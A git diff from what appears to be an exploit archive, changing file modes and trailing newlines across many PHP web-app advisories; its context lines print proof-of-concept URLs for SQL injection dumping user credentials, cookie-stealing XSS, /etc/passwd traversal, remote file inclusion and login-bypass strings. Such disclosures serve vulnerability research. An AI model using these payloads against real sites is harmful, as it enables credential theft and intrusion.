Joomla! 1.6.5 and prior are vulnerable. -http://www.example.com/index.php?option=com_resman&task=list&city=<BODY%20ONLOAD=alert("SOLVER")> \ No newline at end of file +http://www.example.com/index.php?option=com_resman&task=list&city=<BODY%20ONLOAD=alert("SOLVER")> \ No newline at end of file diff --git a/platforms/php/webapps/35974.txt b/platforms/php/webapps/35974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35975.txt b/platforms/php/webapps/35975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35976.txt b/platforms/php/webapps/35976.txt old mode 100755 new mode 100644 index 6efeec03c..1de677bd3 --- a/platforms/php/webapps/35976.txt +++ b/platforms/php/webapps/35976.txt @@ -4,4 +4,4 @@ Synergy Software is prone to an SQL-injection vulnerability because the applicat A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/courses.php?id=-1 union select null,user_loginname_vc,null,null,null,user_pass_vc,null,null,null,null from user_m \ No newline at end of file +http://www.example.com/courses.php?id=-1 union select null,user_loginname_vc,null,null,null,user_pass_vc,null,null,null,null from user_m \ No newline at end of file diff --git a/platforms/php/webapps/35977.txt b/platforms/php/webapps/35977.txt old mode 100755 new mode 100644 index b1642e212..50df7395c --- a/platforms/php/webapps/35977.txt +++ b/platforms/php/webapps/35977.txt @@ -4,4 +4,4 @@ Godly Forums is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/Forum/topics.php?id=2 \ No newline at end of file +http://www.example.com/Forum/topics.php?id=2 \ No newline at end of file diff --git a/platforms/php/webapps/35978.txt b/platforms/php/webapps/35978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35979.txt b/platforms/php/webapps/35979.txt old mode 100755 new mode 100644 index 005b28641..15304de88 --- a/platforms/php/webapps/35979.txt +++ b/platforms/php/webapps/35979.txt @@ -4,4 +4,4 @@ Willscript Recipes website Script Silver Edition is prone to an SQL-injection vu Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/new_recipes/recipes/viewRecipe.php?recipeId=44 \ No newline at end of file +http://www.example.com/new_recipes/recipes/viewRecipe.php?recipeId=44 \ No newline at end of file diff --git a/platforms/php/webapps/3598.txt b/platforms/php/webapps/3598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35984.txt b/platforms/php/webapps/35984.txt old mode 100755 new mode 100644 index 71da4ee39..849adb051 --- a/platforms/php/webapps/35984.txt +++ b/platforms/php/webapps/35984.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Virtual Money 1.5 is affected; other versions may also be vulnerable. -www.example.com/index.php?option=com_virtualmoney&view=landpage&task=subcategory&catid=[EXPLOIT] \ No newline at end of file +www.example.com/index.php?option=com_virtualmoney&view=landpage&task=subcategory&catid=[EXPLOIT] \ No newline at end of file diff --git a/platforms/php/webapps/35985.txt b/platforms/php/webapps/35985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35986.txt b/platforms/php/webapps/35986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35987.txt b/platforms/php/webapps/35987.txt old mode 100755 new mode 100644 index 320e2ceb5..d2e6e73b5 --- a/platforms/php/webapps/35987.txt +++ b/platforms/php/webapps/35987.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. -http://www.example.com/sit/search.php?search_string=1' union select 1,version() \ No newline at end of file +http://www.example.com/sit/search.php?search_string=1' union select 1,version() \ No newline at end of file diff --git a/platforms/php/webapps/35988.txt b/platforms/php/webapps/35988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35989.txt b/platforms/php/webapps/35989.txt old mode 100755 new mode 100644 index 7726a0599..0b22b9bf3 --- a/platforms/php/webapps/35989.txt +++ b/platforms/php/webapps/35989.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. MBoard 1.3 is vulnerable; other versions may also be affected. -http://www.example.com/go.php?url=http://example.com \ No newline at end of file +http://www.example.com/go.php?url=http://example.com \ No newline at end of file diff --git a/platforms/php/webapps/3599.txt b/platforms/php/webapps/3599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35990.txt b/platforms/php/webapps/35990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35991.txt b/platforms/php/webapps/35991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35996.txt b/platforms/php/webapps/35996.txt old mode 100755 new mode 100644 index 55c6b9901..895cb2d82 --- a/platforms/php/webapps/35996.txt +++ b/platforms/php/webapps/35996.txt @@ -27,5 +27,4 @@ Exploit(Cross Site Scripting): Thanks for read :) - Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers. - \ No newline at end of file + Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers. \ No newline at end of file diff --git a/platforms/php/webapps/35998.txt b/platforms/php/webapps/35998.txt old mode 100755 new mode 100644 index 5609a1c02..44f80d5ea --- a/platforms/php/webapps/35998.txt +++ b/platforms/php/webapps/35998.txt @@ -4,4 +4,4 @@ Trading Marketplace script is prone to an SQL-injection vulnerability because th A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/selloffers.php?cid=[SQL] \ No newline at end of file +http://www.example.com/selloffers.php?cid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/3600.txt b/platforms/php/webapps/3600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36000.txt b/platforms/php/webapps/36000.txt old mode 100755 new mode 100644 index 222dffed3..20bd9e3cf --- a/platforms/php/webapps/36000.txt +++ b/platforms/php/webapps/36000.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce HP Network Automation 7.2x, 7.5x, 7.6x, 9.0, 9.10 are vulnerable. -http://www.example.com/view.php?id=1'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11' \ No newline at end of file +http://www.example.com/view.php?id=1'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11' \ No newline at end of file diff --git a/platforms/php/webapps/36003.txt b/platforms/php/webapps/36003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36005.txt b/platforms/php/webapps/36005.txt old mode 100755 new mode 100644 index 6e4e6a068..4193d81a4 --- a/platforms/php/webapps/36005.txt +++ b/platforms/php/webapps/36005.txt @@ -5,4 +5,4 @@ The MyTabs plugin for MyBB is prone to an SQL-injection vulnerability because th A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - \ No newline at end of file +http://www.example.com/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - \ No newline at end of file diff --git a/platforms/php/webapps/36008.txt b/platforms/php/webapps/36008.txt old mode 100755 new mode 100644 index 372181f58..5c7a26d19 --- a/platforms/php/webapps/36008.txt +++ b/platforms/php/webapps/36008.txt @@ -4,4 +4,4 @@ Gilnet News is prone to an SQL-injection vulnerability because it fails to suffi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/[PATH]/read_more.php?id=[Injection] \ No newline at end of file +http://www.example.com/[PATH]/read_more.php?id=[Injection] \ No newline at end of file diff --git a/platforms/php/webapps/36009.txt b/platforms/php/webapps/36009.txt old mode 100755 new mode 100644 index 8bc8f139f..83d69e8c5 --- a/platforms/php/webapps/36009.txt +++ b/platforms/php/webapps/36009.txt @@ -4,4 +4,4 @@ mt LinkDatenbank is prone to a cross-site scripting vulnerability because it fai An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/mt_linkdb/links.php?b=%22%3E%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E \ No newline at end of file +http://www.example.com/mt_linkdb/links.php?b=%22%3E%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36012.txt b/platforms/php/webapps/36012.txt old mode 100755 new mode 100644 index 7739fa3d0..4553b112e --- a/platforms/php/webapps/36012.txt +++ b/platforms/php/webapps/36012.txt @@ -4,4 +4,4 @@ The 'Slideshow Gallery' component for Joomla! is prone to an SQL-injection vulne Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_xeslidegalfx&Itemid=&func=detail&id=1 \ No newline at end of file +http://www.example.com/index.php?option=com_xeslidegalfx&Itemid=&func=detail&id=1 \ No newline at end of file diff --git a/platforms/php/webapps/36015.txt b/platforms/php/webapps/36015.txt old mode 100755 new mode 100644 index 910622b76..a72714236 --- a/platforms/php/webapps/36015.txt +++ b/platforms/php/webapps/36015.txt @@ -4,4 +4,4 @@ The 'com_community' component for Joomla! is prone to an SQL-injection vulnerabi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_community&view=profile&userid=156 \ No newline at end of file +http://www.example.com/index.php?option=com_community&view=profile&userid=156 \ No newline at end of file diff --git a/platforms/php/webapps/36017.txt b/platforms/php/webapps/36017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36018.txt b/platforms/php/webapps/36018.txt old mode 100755 new mode 100644 index a70bbed7e..0dfc50566 --- a/platforms/php/webapps/36018.txt +++ b/platforms/php/webapps/36018.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WP e-Commerce 3.8.6 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/wp-e-commerce/wpsc-theme/wpsc-cart_widget.php?cart_messages[]=%3Cimg%20src=1% 20onerror=javascript:alert%28document.cookie%29%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-e-commerce/wpsc-theme/wpsc-cart_widget.php?cart_messages[]=%3Cimg%20src=1% 20onerror=javascript:alert%28document.cookie%29%3E \ No newline at end of file diff --git a/platforms/php/webapps/36023.txt b/platforms/php/webapps/36023.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36026.txt b/platforms/php/webapps/36026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36027.txt b/platforms/php/webapps/36027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36028.txt b/platforms/php/webapps/36028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36029.txt b/platforms/php/webapps/36029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36031.txt b/platforms/php/webapps/36031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36032.txt b/platforms/php/webapps/36032.txt old mode 100755 new mode 100644 index 087e59bb2..8705f1c39 --- a/platforms/php/webapps/36032.txt +++ b/platforms/php/webapps/36032.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/[path]/admin/index.php?msg=[XSS] http://www.example.com/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS] http://www.example.com/[path]/signinform.php?errmsg=[XSS] -http://www.example.com/[path]/msg_confirm_mem.php?errmsg=[XSS] \ No newline at end of file +http://www.example.com/[path]/msg_confirm_mem.php?errmsg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36033.txt b/platforms/php/webapps/36033.txt old mode 100755 new mode 100644 index 2249dde04..66ab019bb --- a/platforms/php/webapps/36033.txt +++ b/platforms/php/webapps/36033.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Search Network 2.0 is vulnerable; other versions may also be affected. -http://www.example/demo/search.php?action=search_results&query=[XSS Attack] \ No newline at end of file +http://www.example/demo/search.php?action=search_results&query=[XSS Attack] \ No newline at end of file diff --git a/platforms/php/webapps/36034.txt b/platforms/php/webapps/36034.txt old mode 100755 new mode 100644 index a31b3754c..2c1715c60 --- a/platforms/php/webapps/36034.txt +++ b/platforms/php/webapps/36034.txt @@ -11,4 +11,4 @@ http://www.example.com/openemr/interface/main/calendar/index.php?pc_category='<s http://www.example.com/openemr/interface/main/calendar/index.php?pc_topic='<script>alert('XSS');</script> http://www.example.com/openemr/interface/main/messages/messages.php?sortby="<script>alert('XSS');</script> http://www.example.com/openemr/interface/main/messages/messages.php?sortorder="<script>alert('XSS');</script> -http://www.example.com/openemr/interface/main/messages/messages.php?showall=no&sortby=users%2elname&sortorder=asc&begin=724286<"> \ No newline at end of file +http://www.example.com/openemr/interface/main/messages/messages.php?showall=no&sortby=users%2elname&sortorder=asc&begin=724286<"> \ No newline at end of file diff --git a/platforms/php/webapps/36035.txt b/platforms/php/webapps/36035.txt old mode 100755 new mode 100644 index 470e6ceb0..bb2e6922a --- a/platforms/php/webapps/36035.txt +++ b/platforms/php/webapps/36035.txt @@ -4,4 +4,4 @@ BlueSoft Banner Exchange is prone to an SQL-injection vulnerability because it f Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/signup.php?referer_id=1[SQLi] \ No newline at end of file +http://www.example.com/signup.php?referer_id=1[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36036.txt b/platforms/php/webapps/36036.txt old mode 100755 new mode 100644 index fe9629379..1f5de0bf0 --- a/platforms/php/webapps/36036.txt +++ b/platforms/php/webapps/36036.txt @@ -4,4 +4,4 @@ BlueSoft Rate My Photo Site is prone to an SQL-injection vulnerability because i Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?cmd=10&ty=2[SQLi] \ No newline at end of file +http://www.example.com/index.php?cmd=10&ty=2[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36038.txt b/platforms/php/webapps/36038.txt old mode 100755 new mode 100644 index ef2867864..51e696753 --- a/platforms/php/webapps/36038.txt +++ b/platforms/php/webapps/36038.txt @@ -10,4 +10,4 @@ http://www.example.com/wp-admin/admin.php?page=eshop-templates.php&eshoptemplate http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E -http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&viewemail=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&viewemail=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36040.txt b/platforms/php/webapps/36040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36041.txt b/platforms/php/webapps/36041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36044.txt b/platforms/php/webapps/36044.txt old mode 100755 new mode 100644 index 0da204f40..8f4aa74f1 --- a/platforms/php/webapps/36044.txt +++ b/platforms/php/webapps/36044.txt @@ -4,4 +4,4 @@ PHP Flat File Guestbook is prone to a remote file-include vulnerability because Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell? \ No newline at end of file +http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell? \ No newline at end of file diff --git a/platforms/php/webapps/36046.txt b/platforms/php/webapps/36046.txt old mode 100755 new mode 100644 index ba08ed838..fa2d093b0 --- a/platforms/php/webapps/36046.txt +++ b/platforms/php/webapps/36046.txt @@ -4,4 +4,4 @@ phpWebSite is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/mod.php?mod=userpage&page_id=[XSS] \ No newline at end of file +http://www.example.com/mod.php?mod=userpage&page_id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36047.txt b/platforms/php/webapps/36047.txt old mode 100755 new mode 100644 index 6aa4bc8a5..0d1d21bc8 --- a/platforms/php/webapps/36047.txt +++ b/platforms/php/webapps/36047.txt @@ -7,4 +7,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor awiki 20100125 is vulnerable; other versions may also be affected. http://www.example.com/awiki/index.php?page=/etc/passwd -http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd \ No newline at end of file +http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/36048.txt b/platforms/php/webapps/36048.txt old mode 100755 new mode 100644 index 9a2d7f931..5d5083f56 --- a/platforms/php/webapps/36048.txt +++ b/platforms/php/webapps/36048.txt @@ -5,4 +5,4 @@ PHPList is prone to a security-bypass vulnerability and an information-disclosur An attacker can exploit these issues to gain access to sensitive information and send arbitrary messages to registered users. Other attacks are also possible. http://www.example.com/lists/?p=forward&uid=VALID_UID&mid=ID -http://www.example.com/lists/?p=forward&uid=foo&mid=ID \ No newline at end of file +http://www.example.com/lists/?p=forward&uid=foo&mid=ID \ No newline at end of file diff --git a/platforms/php/webapps/3605.php b/platforms/php/webapps/3605.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36050.txt b/platforms/php/webapps/36050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36051.txt b/platforms/php/webapps/36051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36054.txt b/platforms/php/webapps/36054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36055.txt b/platforms/php/webapps/36055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36058.txt b/platforms/php/webapps/36058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36059.txt b/platforms/php/webapps/36059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36061.php b/platforms/php/webapps/36061.php old mode 100755 new mode 100644 index e220e0f00..75ab1f354 --- a/platforms/php/webapps/36061.php +++ b/platforms/php/webapps/36061.php @@ -82,4 +82,4 @@ else { echo 'NOT vulnerable :-('; } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/36068.txt b/platforms/php/webapps/36068.txt old mode 100755 new mode 100644 index df4ab9b9b..1dbe8b297 --- a/platforms/php/webapps/36068.txt +++ b/platforms/php/webapps/36068.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica MantisBT 1.2.6 is vulnerable; other versions may also be affected. http://www.example.com/path/search.php?project_id=[XSS] -http://www.example.com/path/core.php?mbadmin=[SQL] \ No newline at end of file +http://www.example.com/path/core.php?mbadmin=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/3607.txt b/platforms/php/webapps/3607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36072.txt b/platforms/php/webapps/36072.txt old mode 100755 new mode 100644 index 9de2a5b1b..b6068b986 --- a/platforms/php/webapps/36072.txt +++ b/platforms/php/webapps/36072.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OneFileCMS 1.1.1 is vulnerable; other versions may also be affected. -http://www.example.com/onefilecms/onefilecms.php?p='"><marquee><h1>XSS Vulnerability<script>alert(String.fromCharCode(88,83,83))</script></h1></marquee> \ No newline at end of file +http://www.example.com/onefilecms/onefilecms.php?p='"><marquee><h1>XSS Vulnerability<script>alert(String.fromCharCode(88,83,83))</script></h1></marquee> \ No newline at end of file diff --git a/platforms/php/webapps/36073.txt b/platforms/php/webapps/36073.txt old mode 100755 new mode 100644 index c484b2f6e..bc85205ee --- a/platforms/php/webapps/36073.txt +++ b/platforms/php/webapps/36073.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Pandora FMS 3.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file +http://www.example.com/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36074.txt b/platforms/php/webapps/36074.txt old mode 100755 new mode 100644 index f5c87f9fb..d48f882b4 --- a/platforms/php/webapps/36074.txt +++ b/platforms/php/webapps/36074.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access TotalShopUK 1.7.2 is vulnerable; other versions may also be affected. -http://www.example.com/products/c/index.php/1' \ No newline at end of file +http://www.example.com/products/c/index.php/1' \ No newline at end of file diff --git a/platforms/php/webapps/36076.txt b/platforms/php/webapps/36076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36077.txt b/platforms/php/webapps/36077.txt old mode 100755 new mode 100644 index af7a96754..b307cdb31 --- a/platforms/php/webapps/36077.txt +++ b/platforms/php/webapps/36077.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary HTML and script code Open Classifieds 1.7.2 is vulnerable; other versions may also be affected. -http://www.example.com/oc172/?s="+onmouseover=alert(408852135615)+ \ No newline at end of file +http://www.example.com/oc172/?s="+onmouseover=alert(408852135615)+ \ No newline at end of file diff --git a/platforms/php/webapps/36079.txt b/platforms/php/webapps/36079.txt old mode 100755 new mode 100644 index 3b1126625..31376bc01 --- a/platforms/php/webapps/36079.txt +++ b/platforms/php/webapps/36079.txt @@ -4,4 +4,4 @@ Real Estate Script is prone to an HTML-injection vulnerability because it fails Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. -"/></a></><img src=1.gif onerror=alert(1)> \ No newline at end of file +"/></a></><img src=1.gif onerror=alert(1)> \ No newline at end of file diff --git a/platforms/php/webapps/3608.txt b/platforms/php/webapps/3608.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36080.txt b/platforms/php/webapps/36080.txt old mode 100755 new mode 100644 index a5f1a2f00..7fe457f93 --- a/platforms/php/webapps/36080.txt +++ b/platforms/php/webapps/36080.txt @@ -4,4 +4,4 @@ Hotel Portal is prone to an HTML-injection vulnerability because it fails to suf Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. -http://www.example.com/city.php?hotel_city=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&dayfrom=23&monthfrom=8&yearfrom=2011&dayback=24&monthback=8&yearback=2011&guest=1&rooms=1&hotel_stars=&pricefrom=0&pricetill=250&B1=Search \ No newline at end of file +http://www.example.com/city.php?hotel_city=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&dayfrom=23&monthfrom=8&yearfrom=2011&dayback=24&monthback=8&yearback=2011&guest=1&rooms=1&hotel_stars=&pricefrom=0&pricetill=250&B1=Search \ No newline at end of file diff --git a/platforms/php/webapps/36081.txt b/platforms/php/webapps/36081.txt old mode 100755 new mode 100644 index 6b23ebb26..0aa5a746b --- a/platforms/php/webapps/36081.txt +++ b/platforms/php/webapps/36081.txt @@ -4,4 +4,4 @@ VicBlog is prone to an SQL-injection vulnerability because the application fails A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/vicblog/index.php?page=posts&tag=1%27 \ No newline at end of file +http://www.example.com/vicblog/index.php?page=posts&tag=1%27 \ No newline at end of file diff --git a/platforms/php/webapps/36083.txt b/platforms/php/webapps/36083.txt old mode 100755 new mode 100644 index 1954aa396..9067b93b4 --- a/platforms/php/webapps/36083.txt +++ b/platforms/php/webapps/36083.txt @@ -8,4 +8,4 @@ Simple Machines Forum 2.0 and 1.1.14 are vulnerable; other versions may be affec [img]http://www.example.com/index.php?sa=editBuddies;remove=102;action%00=profile[/img] -[img]http://www.example.com/community/index.php?action%00=logout;token[/img] \ No newline at end of file +[img]http://www.example.com/community/index.php?action%00=logout;token[/img] \ No newline at end of file diff --git a/platforms/php/webapps/36084.html b/platforms/php/webapps/36084.html old mode 100755 new mode 100644 index 25c5b6ff8..1ab85ecdb --- a/platforms/php/webapps/36084.html +++ b/platforms/php/webapps/36084.html @@ -41,4 +41,4 @@ function fireForms() <input type="radio" name="sendEmail" value="0" /> <input type="radio" name="sendEmail" value="1" checked="checked" /> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/36085.txt b/platforms/php/webapps/36085.txt old mode 100755 new mode 100644 index a7ede3bc5..69d57e1a7 --- a/platforms/php/webapps/36085.txt +++ b/platforms/php/webapps/36085.txt @@ -4,4 +4,4 @@ phpWebSite is prone to an SQL-injection vulnerability because it fails to suffic A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors \ No newline at end of file +http://www.example.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors \ No newline at end of file diff --git a/platforms/php/webapps/36086.txt b/platforms/php/webapps/36086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36087.txt b/platforms/php/webapps/36087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36089.txt b/platforms/php/webapps/36089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36090.txt b/platforms/php/webapps/36090.txt old mode 100755 new mode 100644 index 346e31eb0..7dd92d643 --- a/platforms/php/webapps/36090.txt +++ b/platforms/php/webapps/36090.txt @@ -5,4 +5,4 @@ ClickCMS is prone to a denial-of-service vulnerability and a CAPTCHA-bypass vuln Attackers can leverage these issues to cause the affected server to stop responding or to bypass certain security mechanisms. http://www.example.com/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2 -http://www.example.com/captcha/CaptchaSecurityImages.php?width=1000&height=9000 \ No newline at end of file +http://www.example.com/captcha/CaptchaSecurityImages.php?width=1000&height=9000 \ No newline at end of file diff --git a/platforms/php/webapps/36091.txt b/platforms/php/webapps/36091.txt old mode 100755 new mode 100644 index 141143279..1edd54656 --- a/platforms/php/webapps/36091.txt +++ b/platforms/php/webapps/36091.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to steal cookie-based authentication creden IBM Open Admin Tool 2.71 and prior are vulnerable. -http://www.example.com:8080/openadmin/index.php?act=login&do=dologin&login_admin=Login&groups=1&grouppass=&informixserver= &host= &port= &username= &userpass= &idsprotocol=onsoctcp&conn_num \ No newline at end of file +http://www.example.com:8080/openadmin/index.php?act=login&do=dologin&login_admin=Login&groups=1&grouppass=&informixserver= &host= &port= &username= &userpass= &idsprotocol=onsoctcp&conn_num \ No newline at end of file diff --git a/platforms/php/webapps/36093.txt b/platforms/php/webapps/36093.txt old mode 100755 new mode 100644 index eab57ee2f..05ae64e6f --- a/platforms/php/webapps/36093.txt +++ b/platforms/php/webapps/36093.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc CS-Cart 2.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/controllers/customer/products.php?tabs_group_id=[SQL INJECT] \ No newline at end of file +http://www.example.com/controllers/customer/products.php?tabs_group_id=[SQL INJECT] \ No newline at end of file diff --git a/platforms/php/webapps/36094.txt b/platforms/php/webapps/36094.txt old mode 100755 new mode 100644 index 37ae1fba3..68b717d60 --- a/platforms/php/webapps/36094.txt +++ b/platforms/php/webapps/36094.txt @@ -14,4 +14,4 @@ http://www.example.com/admin/upload/tfu_213.swf =>> =>> If login : -> Auth ByPass = -- user = ' or '=' or ' --- pass = ' or '=' or ' \ No newline at end of file +-- pass = ' or '=' or ' \ No newline at end of file diff --git a/platforms/php/webapps/36095.txt b/platforms/php/webapps/36095.txt old mode 100755 new mode 100644 index 37236adb0..a29c6d395 --- a/platforms/php/webapps/36095.txt +++ b/platforms/php/webapps/36095.txt @@ -8,4 +8,4 @@ Serendipity 1.5.1 is vulnerable; other versions may also be affected. http://www.example.com/research_display.php?ID=47 and 1=1 //\\ http://www.aarda.org/research_display.php?ID=47 and 1=2 -http://www.example.com/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,group_concat%28user,0x3a,pass,0x3a,email%29,null,null,null+FROM+Admin \ No newline at end of file +http://www.example.com/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,group_concat%28user,0x3a,pass,0x3a,email%29,null,null,null+FROM+Admin \ No newline at end of file diff --git a/platforms/php/webapps/36096.txt b/platforms/php/webapps/36096.txt old mode 100755 new mode 100644 index 39d1f2d35..4a5a2c5d2 --- a/platforms/php/webapps/36096.txt +++ b/platforms/php/webapps/36096.txt @@ -4,4 +4,4 @@ Web Professional is prone to an SQL-injection vulnerability because it fails to Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.examplecom/default.php?t=news&id=[SQL] \ No newline at end of file 